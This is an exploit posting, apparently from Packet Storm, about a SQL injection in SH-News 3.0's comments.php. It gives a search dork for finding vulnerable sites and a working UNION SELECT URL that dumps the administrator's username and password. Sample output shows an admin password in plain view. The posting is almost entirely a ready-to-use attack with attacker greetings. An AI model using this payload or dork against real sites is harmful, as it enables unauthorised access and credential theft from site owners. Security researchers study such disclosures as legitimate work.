SH-News version 3.0 suffers from a remote SQL injection vulnerability in comments.php.
20ee425a806daa62b495d16f060bf6ff26fcf9a931b38b9d2c1ccac340036944
########################################################################
# #
# ...:::::SH-News 3.0 SQL Injection Vulnerbility ::::.... #
########################################################################
Virangar Security Team
www.virangar.org
www.virangar.net
--------
Discoverd By : hadihadi
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all iranian hackerz
greetz:to my best friend in the world hadi_aryaie2004
-----------------------------------
dork: Powered by SH-News 3.0
-----------------------------------
vlu:
http://site.com/patch/comments.php?id=-1'union%20select%201,2,nick,4,5,password,7%20from%20shnews3_users%20where%20id=1/*
-------------------------------------
you can see somting such as:
Poster: admin Posted: 01.01.1970 03:30
z4478ad
#############
'admin' is admin user & 'z4478ad' is admin password
-------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed